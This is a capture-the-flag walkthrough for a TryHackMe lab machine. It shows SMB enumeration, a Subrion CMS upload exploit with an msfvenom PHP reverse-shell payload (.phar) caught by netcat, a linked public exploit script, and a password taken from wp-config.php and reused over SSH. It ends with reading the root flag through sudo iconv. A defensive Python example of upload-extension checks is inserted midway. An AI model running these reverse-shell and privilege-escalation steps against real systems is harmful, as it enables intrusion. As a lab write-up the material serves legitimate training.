tryhackme_techsupp0rt_walkthrough

Room Name - Tryhackme techsupp0rt1  

https://tryhackme.com/room/techsupp0rt1 

Difficulty - Easy

Created by - Vikaran

After starting the machine, we find the Apache default web page running on port 80.

Scanning with nmap -> sudo nmap -sC -sV <ip> | tee nmap.txt

Listing SMB shares -> smbclient -L <ip>

We are able to log in to the websvr share anonymously.

smbclient \\\\<ip>\\websvr

Locate the enter.txt file on the share.

The note tells us about a Subrion site that needs fixing. Going to http://<ip>/subrion doesn't load anything, but the note says to edit it from the panel.

If we visit http://<ip>/subrion/panel we will see the login page of Subrion CMS.

We have found the username admin, but the password is encrypted.

If you Google "cooked with magical formula" together with the keyword "encryption", you will get a result pointing to CyberChef. Visit the website, paste the encrypted password into the input section and double-click the Magic operation on the left-hand side. The first result is the password.

Now that we have both the login name and the password, we can log in to Subrion. We also know from the login page that the Subrion version is 4.2.1. Another quick Google search will tell us that this version has a file upload vulnerability.

With this information we can start digging around the admin portal. We can find an upload feature under Content->Uploads.

Create a PHP payload with msfvenom or download a PHP reverse shell script online.

msfvenom -p php/reverse_php LHOST=<ip> LPORT=<port> -f raw > rev_shell.phar

Note: the file extension should be .phar.
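Why the .phar extension slips past the upload check, as an added example that is not code from the room or from the Subrion project: a constructed extension denylist of the kind such a filter uses, beside an allowlist check that rejects the same file. The function names, the two lists and the sample file names are assumptions built for this illustration.

```python
import os
import re
import secrets

# Constructed denylist, modelled on the kind of extension filter the walkthrough
# bypasses: it names the obvious PHP extensions but not every one the web server
# may hand to the PHP interpreter (.phar is the gap used in the walkthrough).
DENYLIST = {"php", "php3", "php4", "php5", "phtml"}

# Allowlist of the extensions an image/document upload feature actually needs.
ALLOWLIST = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}


def extensions(filename):
    """All extensions of the base name, lowercased: 'a.jpg.phar' -> ['jpg', 'phar']."""
    parts = os.path.basename(filename).lower().split(".")
    return parts[1:]


def denylist_accepts(filename):
    """Vulnerable check: accept anything whose last extension is not denylisted."""
    exts = extensions(filename)
    return bool(exts) and exts[-1] not in DENYLIST


def allowlist_accepts(filename):
    """Hardened check: a single allowlisted extension and a plain base name."""
    base = os.path.basename(filename)
    # One run of safe characters, one dot, one short extension: no double extensions.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}", base):
        return False
    return extensions(base)[0] in ALLOWLIST


def stored_name(filename):
    """Server-chosen storage name keeping only the validated extension, or None."""
    if not allowlist_accepts(filename):
        return None
    return "%s.%s" % (secrets.token_hex(8), extensions(filename)[0])


if __name__ == "__main__":
    for name in ("rev_shell.php", "rev_shell.phar", "photo.jpg", "photo.jpg.phar"):
        print(name, "denylist:", denylist_accepts(name), "allowlist:", allowlist_accepts(name))
```

The allowlist is only half of the fix: the upload directory should also be served with script execution disabled (with Apache and mod_php, `php_admin_flag engine off` in that directory's block), so a file that does slip through is never interpreted.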

Alternatively, you can download the Python script below to automate this process.

https://github.com/h3v0x/CVE-2018-19422-SubrionCMS-RCE.git

The syntax to run the exploit is:

python3 exploit.py -h url -l username -p password

We catch the shell with netcat:

nc -lvnp 8888

We have a shell as the user www-data.

The pwd command tells us we are in the /var/www/html/subrion/uploads directory.

Go to the /var/www/html/wordpress directory. If we ran gobuster earlier (gobuster dir -u <ip> -w <wordlist>), we already know that a WordPress site exists.

In the wordpress directory you will see a 'wp-config.php' file. Going through this file, you will discover another password.

At this point you can try to log in to WordPress, but you can save time by finding the username of the user listed in the /home directory.

SSH into the target with that username and the second password discovered in the wp-config.php file:

ssh scamsite@<ip>

Enter the password discovered.

We are now logged in as scamsite.

sudo -l

This reveals that we can run /usr/bin/iconv with sudo.

Simply run:

sudo iconv /root/root.txt

We will grab the root.txt flag!
